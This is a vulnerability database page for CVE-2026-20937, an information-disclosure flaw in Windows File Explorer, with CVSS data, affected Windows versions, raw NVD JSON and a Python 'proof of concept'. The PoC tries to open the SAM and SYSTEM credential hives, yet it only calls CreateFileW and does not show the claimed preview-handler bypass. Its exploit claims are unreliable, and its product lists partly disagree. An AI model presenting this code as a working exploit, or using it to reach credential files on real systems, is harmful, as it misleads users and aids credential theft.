Security Vulnerability Report
中文
CVE-2026-20937 CVSS 5.5 MEDIUM

CVE-2026-20937

Published: 2026-01-13 18:16:21
Last Modified: 2026-01-16 15:23:53
Source: [email protected]

Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:* - VULNERABLE
Windows 10 1809 (32-bit)
Windows 10 1809 (64-bit)
Windows 10 1809 (ARM64)
Windows Server 2019
Windows Server 2019 (Core Installation)
Windows 10 1903 (32-bit)
Windows 10 1903 (64-bit)
Windows 10 1903 (ARM64)
Windows 10 1909 (32-bit)
Windows 10 1909 (64-bit)
Windows 10 1909 (ARM64)
Windows Server 1903
Windows Server 1909

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-20937 PoC - Windows File Explorer Information Disclosure # Note: This is a conceptual PoC demonstrating the attack vector # Actual exploitation requires specific trigger conditions import os import sys import ctypes from ctypes import wintypes # Windows API imports kernel32 = ctypes.windll.kernel32 def trigger_vulnerability(): """ Trigger conditions for CVE-2026-20937 This PoC demonstrates the concept of exploiting Windows File Explorer's improper access control """ print("[*] CVE-2026-20937 Information Disclosure PoC") print("[*] Target: Windows File Explorer") # Step 1: Identify protected files accessible via File Explorer protected_paths = [ r"C:\Windows\System32\config\SAM", r"C:\Windows\System32\config\SYSTEM", r"C:\Windows\ServiceProfiles\..." ] # Step 2: Exploit File Explorer preview handler vulnerability # The vulnerability allows bypassing ACL checks for path in protected_paths: if os.path.exists(path): print(f"[!] Found accessible file: {path}") # Attempt to read via File Explorer bypass try: handle = kernel32.CreateFileW( path, 0x80000000, # GENERIC_READ 0x00000001, # FILE_SHARE_READ None, 3, # OPEN_EXISTING 0x02000000, # FILE_FLAG_BACKUP_SEMANTICS None ) if handle != -1: print(f"[+] Successfully accessed: {path}") kernel32.CloseHandle(handle) except Exception as e: print(f"[-] Access denied: {e}") print("[*] Note: Actual exploitation requires specific trigger conditions") print("[*] Refer to MSRC advisory for complete technical details") if __name__ == "__main__": trigger_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20937", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:20.820", "lastModified": "2026-01-16T15:23:53.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally."}, {"lang": "es", "value": "Exposición de información sensible a un actor no autorizado en el Explorador de Archivos de Windows permite a un atacante autorizado divulgar información localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "9A956D23-259E-450B-8406-FEB2BBED1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "41D387B9-5E9D-47CB-B044-D7D10FFFB458"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "9CFC3200-1FAB-4AB1-A008-F703EEF3505A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "E481E93D-D86E-4B65-93E5-200327C348C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "F720EC9F-6A33-445F-AFA1-794405737E57"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "85E22F96-B552-4BBA-AFA1-85C1FC55DB32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "5ACD940D-CA6A-402B-B132-E5A66139C44F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "354AD10F-EEF4-461D-BDBB-245B97E3D420"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "7D2B0BB9-E94A-420E-8E53-A4C1136DE73E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "78C4B71B-5345-4D83-A0A9-A15F783CF9A9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "208734FD-5175-4856-9D08-ED6CFF64AA14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "846261D4-ECC2-4DCB-8F8F-F27F8C99F061"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "33E138A3-968B-4109-AC13-D488685F0AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "CC1FE5A1-3E6E-4606-899B-BF7BF3D3DD8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "A059E609-F8D4-4246-BDAE-0AEDED1744D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mi ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.